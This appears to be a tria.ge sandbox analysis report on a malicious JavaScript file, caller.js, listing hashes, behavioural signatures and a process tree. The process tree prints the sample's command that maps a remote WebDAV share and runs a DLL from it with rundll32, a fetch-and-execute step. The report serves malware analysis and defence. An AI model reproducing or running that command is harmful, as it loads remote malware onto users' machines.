Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
91s -
max time network
97s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
01/10/2024, 18:57
Static task
static1
Behavioral task
behavioral1
Sample
caller.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
caller.js
Resource
win10-20240611-en
Behavioral task
behavioral3
Sample
caller.js
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
caller.js
Resource
win11-20240802-en
General
-
Target
caller.js
-
Size
1.5MB
-
MD5
93f6ba457cf4546708a88012d0407c6b
-
SHA1
14551a86622b82de8ab6cb3dc17d3583f5210a52
-
SHA256
d8b97079a169acd2113f436bef00a941f1f5d0746d90b0d8ed3f0312d754c18c
-
SHA512
af082054c95ddf920b763947e7cdb78859eb9ca3a0261996dd53b918836d84e5b544a68e1c186fbc36cbd12c238554ef5df352900ad5d80eea513ba1321341d0
-
SSDEEP
24576:0t2TNX+qdOp1w8K9hcxXwcUlINc6i8OmmdLBR92w0WqXJJ15XqcyTdiG0KtX:0t2TNX+qdOpjKzcxXMiNcqSpFS1BMioX
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: net.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 1520 timeout.exe -
Runs net.exe
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4844 wrote to memory of 4020 4844 wscript.exe 79 PID 4844 wrote to memory of 4020 4844 wscript.exe 79 PID 4844 wrote to memory of 864 4844 wscript.exe 81 PID 4844 wrote to memory of 864 4844 wscript.exe 81 PID 4020 wrote to memory of 4744 4020 cmd.exe 83 PID 4020 wrote to memory of 4744 4020 cmd.exe 83 PID 864 wrote to memory of 1520 864 cmd.exe 84 PID 864 wrote to memory of 1520 864 cmd.exe 84
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\caller.js1⤵
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c net use W: \\5n.si@ssl\tx && C:\Windows\syswow64\rundll32 w:\f\o.dll,%random%%random%2⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\system32\net.exenet use W: \\5n.si@ssl\tx3⤵
- Enumerates connected drives
PID:4744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 180 && net use W: /d /y2⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\system32\timeout.exetimeout 1803⤵
- Delays execution with timeout.exe
PID:1520
-
-